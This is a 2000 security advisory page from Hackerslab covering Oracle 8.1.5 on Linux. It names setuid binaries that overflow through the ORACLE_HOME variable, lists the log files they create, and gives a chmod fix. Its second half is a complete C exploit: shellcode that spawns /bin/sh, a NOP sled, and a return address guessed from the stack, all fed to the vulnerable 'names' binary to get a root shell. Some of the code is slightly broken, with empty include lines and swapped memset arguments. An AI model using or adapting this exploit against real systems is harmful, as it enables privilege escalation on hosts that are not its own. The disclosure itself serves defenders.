[ advisories | exploits | discussions | news | conventions | security tools | texts & papers ]
 main menu
- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news
 
 discussions
- read forum
- new topic
- search
 

 meetings
- meetings list
- recent additions
- add your info
 
 top 100 sites
- visit top sites
- sign up now
- members
 
 webmasters

- add your url
- add domain
- search box
- link to us

 
 projects
- our projects
- free email
 
 m4d network
- security software
- secureroot
- m4d.com
Home : Advisories : Linux ORACLE 8.1.5 vulnerability

Title: Linux ORACLE 8.1.5 vulnerability
Released by: Hackerslab
Date: 20th October 2000
Printable version: Click here
================================================================================



             [ Hackerslab bug_paper ] Linux ORACLE 8.1.5 vulnerability



================================================================================







File   :   Oracle 8.1.5





SYSTEM :   LINUX



           Tested by  RedHat Linux 6.2





INFO :



There are two security vulnerability in Oracle.





1. buffer overflow

It is possible to create a buffer overflow vulnerability using "ORACLE_HOME",

one of the environmental value of Oracle.

Oracle applications that are vulnerable to buffer overflow are as follow :

- names

- namesctl

- onrsd

- osslogin

- tnslsnr

- tnsping

- trcasst

- trcroute

Thease applications allow an attacker to excute a buffer overflow exploit.





2. Log-files created

When a user excutes one of Oracle applications such as names, oracle or tnslsnr,

following log files are created.



names

======

-rw-rw-r--   1 oracle   dba             0 Oct 20 01:45 ckpcch.ora

-rw-rw-r--   1 oracle   dba           428 Oct 20 01:45 ckpreg.ora

-rw-rw-r--   1 oracle   dba           950 Oct 20 01:45 names.log



oracle

======

-rw-rw----   1 oracle   dba           616 Oct 20 05:14 ora_[running pid].trc



tnslsnr

=======

-rw-rw-r--   1 oracle   dba       2182176 Oct 20  2000 listener.log







SOLUTION



Contact your vendor for a patch or close setuid permission.



# su - oracle

$ cd /oracle_8.1.5_install_directory/bin

$ chmod a-s names  namesctl  onrsd  osslogin  tnslsnr  tnsping  trcasst  trcroute









==-------------------------------------------------------------------------------==

       ********

   *    **   **    *

 *      **   **      *

*       ******       *

 *      **   **      *                                       loveyou@hackerslab.org     [yong-jun, kim]

   *    **   **    *                                    [  http://www.hackerslab.org ]

       ********            HACKERSLAB (C)  since 1999

==-------------------------------------------------------------------------------==







/*



Oracle 8.1.5 exploit 

-by loveyou



offset value : -500 ~ +500



*/

#include 

#include 



#define BUFFER          800

#define NOP             0x90

#define PATH               "/hackerslab/loveyou/oracle/8.1.5/bin/names"



char shellcode[] =

/* - K2 - */

/* main: */

"\xeb\x1d"                                        /* jmp callz               */

/* start: */

"\x5e"                                                 /* popl %esi               */

"\x29\xc0"                                         /* subl %eax, %eax         */

"\x88\x46\x07"                       /* movb %al, 0x07(%esi)    */

"\x89\x46\x0c"                                /* movl %eax, 0x0c(%esi)   */

"\x89\x76\x08"                                /* movl %esi, 0x08(%esi)   */

"\xb0\x0b"                                        /* movb $0x0b, %al         */

"\x87\xf3"                                          /* xchgl %esi, %ebx        */

"\x8d\x4b\x08"                                /* leal 0x08(%ebx), %ecx   */

"\x8d\x53\x0c"                                /* leal 0x0c(%ebx), %edx   */

"\xcd\x80"                                        /* int $0x80               */

"\x29\xc0"                                        /* subl %eax, %eax         */

"\x40"                                                 /* incl %eax               */

"\xcd\x80"                                        /* int $0x80               */

/* callz: */

"\xe8\xde\xff\xff\xff"                    /* call start              */

"/bin/sh";





unsigned long getesp(void)

{

        __asm__("movl %esp,%eax");

}



int main(int argc, char *argv[])

{

        char *buff, *ptr,binary[120];

        long *addr_ptr, addr;

        int bsize=BUFFER;

        int i,offset;



        offset = 0 ;



        if ( argc > 1 ) offset = atoi(argv[1]);



        buff = malloc(bsize);

        addr = getesp() - 5933 - offset;

        ptr = buff;

        addr_ptr = (long *) ptr;



        for (i = 0; i < bsize; i+=4)

                *(addr_ptr++) = addr;



        memset(buff,bsize/2,NOP);



        ptr = buff + ((bsize/2) - (strlen(shellcode)/2));

        for (i = 0; i < strlen(shellcode); i++)

                *(ptr++) = shellcode[i];



        buff[bsize - 1] = '\0';



        setenv("ORACLE_HOME",buff,1);



        printf("[ offset:%d buffer=%d ret:0x%x ]\n",

                offset,strlen(buff),addr);

        system(PATH);



}








(C) 1999-2000 All rights reserved.